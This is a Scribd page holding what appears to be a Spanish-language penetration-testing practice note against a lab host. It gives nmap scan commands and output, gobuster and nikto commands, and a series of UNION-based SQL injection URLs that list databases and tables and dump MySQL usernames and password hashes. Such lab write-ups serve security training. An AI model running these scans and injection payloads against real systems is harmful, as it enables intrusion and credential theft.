Scribd Logo
Upload

Welcome to Scribd!

  • Practica Dia 1 - 31-05-2022

    Uploaded by

    WALTER MORAN
    33 views2 pages
    The document scans an IP address 172.20.254.10 using Nmap to identify open ports and services. It finds ports 22, 25, and 80 open with SSH, SMTP, and HTTP services respectively. It then examines the services in more detail, identifying the specific versions of OpenSSH, Sendmail, and Apache running. It also identifies potential ways to further enumerate the target system such as using gobuster and nikto tools against the web server, and exploiting SQL injection on the web application to extract data from MySQL database tables.

    Original Description:

    Original Title

    PRACTICA DIA 1- 31-05-2022

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document scans an IP address 172.20.254.10 using Nmap to identify open ports and services. It finds ports 22, 25, and 80 open with SSH, SMTP, and HTTP services respectively. It then examines the services in more detail, identifying the specific versions of OpenSSH, Sendmail, and Apache running. It also identifies potential ways to further enumerate the target system such as using gobuster and nikto tools against the web server, and exploiting SQL injection on the web application to extract data from MySQL database tables.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    33 views2 pages

    Practica Dia 1 - 31-05-2022

    Uploaded by

    WALTER MORAN
    The document scans an IP address 172.20.254.10 using Nmap to identify open ports and services. It finds ports 22, 25, and 80 open with SSH, SMTP, and HTTP services respectively. It then examines the services in more detail, identifying the specific versions of OpenSSH, Sendmail, and Apache running. It also identifies potential ways to further enumerate the target system such as using gobuster and nikto tools against the web server, and exploiting SQL injection on the web application to extract data from MySQL database tables.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 2

    nmap -sn 172.20.254.

    0/24 | grep "Nmap scan report for" | cut -d ' ' -f5
    ______________________________________________________________
    R
    172.20.254.10

    nmap -sC -sV -P0 -p`nmap -P0 -p- --min-rate=5000 -T5 172.20.254.10 | grep ^[0-9] |
    cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//g'` -A -T4 172.20.254.10 > tcp-full-
    ports.txt

    ________________________________________________________________________
    Abre el archivo del escaneo previo
    cat tcp-full-ports.txt

    RESULTADO
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
    | ssh-hostkey:
    | 1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
    |_ 2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
    _______________________________________________________________________
    25/tcp open smtp Sendmail 8.13.5/8.13.5
    | smtp-commands: dmzweb.naat-nalak.com Hello [172.31.240.18], pleased to meet you,
    ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY,
    HELP
    |_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT
    DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS
    2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation
    send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send
    email to Postmaster at your site. 2.0.0 End of HELP info
    ______________________________________________________________________
    80/tcp open http Apache httpd 2.2.0 ((Fedora))
    |_http-title: Naat-nalaK
    | http-robots.txt: 5 disallowed entries
    |_/mail/ /restricted/ /conf/ /sql/ /admin/
    |_http-server-header: Apache/2.2.0 (Fedora)
    Service Info: Host: dmzweb.naat-nalak.com; OS: Unix

    ___________________________________________________________________________________
    ________
    APLICACIONES ALTERNATIVAS

    gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://172.20.254.10/

    nikto -h 172.20.254.10

    NOTA: Un server solo debe tener habilitado los metodos GET ; POST

    _______________________________________________________________________
    TABLAS MAESTRAS

    information_schema: NOMBRE DE LAS BASES DE DATOS

    172.20.254.10/index.html?page=blog&id=200 union select 1, 2, 3, 4, 5 %23


    172.20.254.10/index.html?page=blog&id=200 union select 1, 2, schema_name, 4, 5 from
    information_schema.schemata %23
    172.20.254.10/index.html?page=blog&id=200 union select 1, 2, table_name, 4, 5 from
    information_schema.tables where table_schema= 'mysql' %23

    172.20.254.10/index.html?page=blog&id=200 union select 1, 2, table_name, 4, 5 from


    information_schema.tables where table_schema= 'mysql' and table_name= 'phpc_users'
    %23

    172.20.254.10/index.html?page=blog&id=200 union select 1, 2, column_name, 4, 5 from


    information_schema.columns where table_schema= 'mysql' and table_name='user' %23

    172.20.254.10/index.html?page=blog&id=200 union select 1, 2, user, 4, Password from


    mysql.user %23

    You might also like